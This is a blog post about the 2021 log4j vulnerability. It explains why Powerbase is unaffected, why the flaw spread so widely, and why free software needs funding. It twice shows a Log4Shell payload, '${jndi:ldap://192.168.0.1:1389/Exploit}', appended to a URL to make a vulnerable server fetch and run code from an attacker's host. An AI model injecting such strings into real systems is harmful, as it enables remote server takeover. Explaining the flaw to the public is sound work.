+++
title = "Powerbase not affected by log4j but..."
date = "2021-12-17T12:47:08+02:00"
tags = ["security"]
categories = ["general"]
banner = "img/blogs/log4j.jpg"
+++

**Let's start with the good news:** Powerbase is not affected by the recently
discovered vulnerability in the `log4j` software package that is getting
publicity these days. 

Powerbase is not affected because the vulnerable software is written in the
Java programming language and Powerbase is written in the PHP and JavasSript
languages (JavaScript, despite having a similar sounding name, is entirely
different then the Java programming language).

**Now, the bad news:** the odds are high that some server in the world holding your
personal data or providing some useful service to you **is** vulnerable and may
be exploited.

## What? How is this possible?

The `log4j` problem has been called a perfect storm for a number of reasons:

 * The flawed code is in a software library - which means it's a software
   program used by other software programs to do a specific job - in this case,
   logging information about what the program is doing. That means the problem
   is not limited to just *one* program, but to every program that uses this
   software library.

 * The software library, called `log4j`, is released under a free software
   license that permits its use in both free software as well as proprietary
   softare. And, it happens to be wildly popular. Like even Microsoft's
   Minecraft video game is vulnerable.

 * The vulnerability is triggered if certain text is logged. What is being
   logged by `log4j` varies depending on the software. 

     But to give you a taste: if you have a web site that uses `log4j`, it most
     likely will log every address that it receives. If a user normally visits
     the web site by typing: `https://yoursite.org/article-about-mushrooms` that
     entire address will show up in your logs so you can track how many people
     are trying to read your article about mushrooms. 

     If your server is vulnerable to `log4j`, any attacker could simply type:
     `https://yoursite.org/article-about-mushrooms?${jndi:ldap://192.168.0.1:1389/Exploit}`.
     Due to the `log4j` bug, the extra text at the end, when it reaches `log4j`, will
     be turned into malicious code granting access to the attacker.

     **Yes, this means taking over a server is as easy as typing in a web address
     on a vulnerable server.**

 * And finally, the kicker: normally, when a vulnerability is discovered, it is
   reported to the authors of the software before it is made public. Then, the
   authors of the software release a new, protected version of the software at
   the same time as they announce the existence of the bug. This still sets up
   a race: malicious actors learn about how to exploit the bug and try to begin
   exploiting it, while systems administrators frantically rush to upgrade
   their servers first.

     However, in this case, the vulnerability was being exploited about a week
     after the bug was reported and a full week *before* it was made public.
     Someone spilled the beans. So instead of having a fair chance at upgrading
     software, many systems administrators found their servers already
     compromised when they began their upgrades.

## What does this mean for the world?

I thought you'd never ask. 

It means **we need to start paying for the software we use,** even if the software
is released under a free software license. Before the dot com explosion, free
software was developed in communities of collaboration.  There were plenty of
bugs, but enough cooperation to collectively resolve them. 

However, as more and more profit focused enterprises began writing software,
they realized they could make a killing by stitching together free software
into their own proprietary projects. They made millions, the authors of the
free software made nothing. And as a result, some of the critical free software
projects, many of which hold up significant amounts of our Internet
architecture, are woefully underfunded.

**At the Progressive Technology Project we owe a huge debt to the amazing work of
the [CiviCRM](https://civicrm.org/) developers and community** for doing the
lion's share of the development work to make the database, that Powerbase is
based upon, secure, reliable and functional.

Although we don't charge Powerbase groups for the software (we only charge you
for hosting and support) we still send a signficant portion of our income
straight to the CiviCRM core team to support this work.

## Can I really take over a server with just a fancy URL?

Well, that's not the full story. The malicious actors exploiting this bug
*first* have to setup a server that can provide the malicious code when
requested on an IP address (e.g. 192.168.0.1). *Then* they append the
string "{jndi:ldap://192.168.0.1:1389/Exploit}". That snippet instructs the
`log4j` software to query the server at that address and execute the code it
provides.

So, the initial setup is complicated, but after that it's quite easy.

*Image credit: https://commons.wikimedia.org/wiki/File:Fireplace_Burning.jpg*
